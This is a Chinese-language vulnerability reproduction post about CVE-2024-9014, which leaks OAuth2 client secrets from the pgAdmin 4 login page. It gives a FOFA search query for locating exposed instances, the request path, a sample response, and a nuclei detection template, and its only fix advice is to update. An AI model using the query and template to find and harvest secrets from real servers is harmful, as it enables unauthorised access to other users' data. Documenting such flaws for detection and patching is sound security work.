文章目录
- 免责声明
- 漏洞描述
- 搜索语法
- 漏洞复现
- nuclei
- 修复建议
免责声明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
漏洞描述
pgAdmin4 是开源数据库 PostgreSQL 的图形管理工具攻击者可构造恶意请求获取客户端ID和密钥,从而导致未经授权访问其他用户数据
搜索语法
fofa
icon_hash="1502815117"
漏洞复现
访问路径http://ip/login?next=/
查看响应包
响应内容
<script type="application/javascript">
try {
require(
['security.pages'],
function() {
window.renderSecurityPage('login_user', {"authSources": ["internal"], "authSourcesEnum": {"KERBEROS": "kerberos", "OAUTH2": "oauth2"}, "csrfToken": "IjM5YjhjZGJlZjM2OTQzNTg5M2QyMWEzNDMzYzU1ZDczNTlmODQwM2Mi.ZwSebA.GaAE-WFrqQP1H7q11HTAzDl8sdU", "forgotPassUrl": "/browser/reset_password", "langOptions": [{"label": "English", "value": "en"}, {"label": "Chinese (Simplified)", "value": "zh"}, {"label": "Czech", "value": "cs"}, {"label": "French", "value": "fr"}, {"label": "German", "value": "de"}, {"label": "Indonesian", "value": "id"}, {"label": "Italian", "value": "it"}, {"label": "Japanese", "value": "ja"}, {"label": "Korean", "value": "ko"}, {"label": "Polish", "value": "pl"}, {"label": "Portuguese (Brazilian)", "value": "pt_BR"}, {"label": "Russian", "value": "ru"}, {"label": "Spanish", "value": "es"}], "loginBanner": "", "loginUrl": "/authenticate/login", "oauth2Config": [{"OAUTH2_ADDITIONAL_CLAIMS": null, "OAUTH2_API_BASE_URL": null, "OAUTH2_AUTHORIZATION_URL": null, "OAUTH2_BUTTON_COLOR": null, "OAUTH2_CLIENT_ID": null, "OAUTH2_CLIENT_SECRET": null, "OAUTH2_DISPLAY_NAME": "\u003cOauth2 Display Name\u003e", "OAUTH2_ICON": null, "OAUTH2_LOGOUT_URL": null, "OAUTH2_NAME": null, "OAUTH2_SCOPE": null, "OAUTH2_SERVER_METADATA_URL": null, "OAUTH2_SSL_CERT_VERIFICATION": true, "OAUTH2_TOKEN_URL": null, "OAUTH2_USERINFO_ENDPOINT": null, "OAUTH2_USERNAME_CLAIM": null}], "userLanguage": "en"},
{"messages": [["error", "You must sign in to view this resource."]]});
}, function() {
console.log(arguments);
}
);
} catch (err) {
console.log(err);
}
</script>
nuclei
id: CVE-2024-9014 pgAdmin 4 Sensitive Data Exposure
info:
name: pgAdmin 4 Sensitive Data Exposure
author: xl
severity: critical
http:
- raw:
- |
GET /login?next=/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
negative: true
regex:
- 'OAUTH2_CLIENT_SECRET": null'
- type: word
part: body
words:
- '<title>pgAdmin 4</title>'
- 'OAUTH2_CLIENT_SECRET'
condition: and
- type: status
status:
- 200
修复建议
更新到最新版本